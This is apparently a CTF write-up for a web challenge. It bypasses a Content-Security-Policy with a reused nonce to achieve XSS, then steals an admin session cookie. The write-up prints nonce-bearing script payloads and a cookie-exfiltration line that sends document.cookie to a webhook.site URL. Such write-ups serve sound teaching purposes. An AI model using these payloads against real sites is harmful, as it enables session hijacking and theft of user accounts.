web exploitation



09 August 2020

Points: 212

Problem :lock:

We got a webpage with a text input that we can send to 2 different pages.

View HTML source
<title>L29 WEBINAR</title>
<form id="form1" action="preview.php" method="post" class="">
<h1>Welcome to my Webinar,
<span>Leave your message here!</span>
<img src="l29_logo.png" alt="L29_IS_HERE">
<textarea name="content"></textarea>
<button onclick="form1.submit();">preview</button> <button onclick="form1.action='submit.php';form1.submit();" id="report" disabled="disabled">report</button>

<script type="text/javascript">
    window.onload=function() {
        document.getElementById('report').disabled = null;
<p>Please report every 20 seconds<p>

Solution :key:

We tried to give random stuff to both pages preview.php and submit.php

preview.php just previews the message, as expected

submit.php gives us a hint that an admin will view the message.

So we went to check the source of preview.php, and there’s some javascript code with a nonce attribute, looks like some debugging code leftover or really just a hint.

We can also see the same nonce value in the html head, and it has an interesting string alongside it, ‘Content-Security-Policy’. So after some googling, we know that only script tags with the same nonce value as the one in the head is allowed to run. BUT the nonce value is supposed to be only used once and then thrown away, something like a CSRF token, BUT this page doesn’t do that. We tried to submit another string to preview.php and the nonce value is still the same.

Let’s try a regular XSS attack, qwe<script>alert(1)</script>

Didn’t run, now let’s try to give it the nonce value, so our XSS payload will be qwe<script nonce="ee4acf3f4f6e7b632e806741f29e463b">alert(1)</script>

It works, we have XSS! We looked for some more clues and found that we have a cookie, PHPSESSID, looks like we’re going to steal the admin cooke with XSS then.

Let’s set up a webhook to catch our request, and try out a simple cookie stealing XSS. Also, we’ll send it to submit.php this time since the admin will visit there.

<script nonce="ee4acf3f4f6e7b632e806741f29e463b">
    window.location = 'https://webhook.site/1f6dfc05-fa80-490a-a2db-14f57ecc48ae/'+document.cookie;

We just append the admin cookie in our request to our webhook. Not long after submitting, we got the admin cookie which is actually the flag.

Flag :checkered_flag:
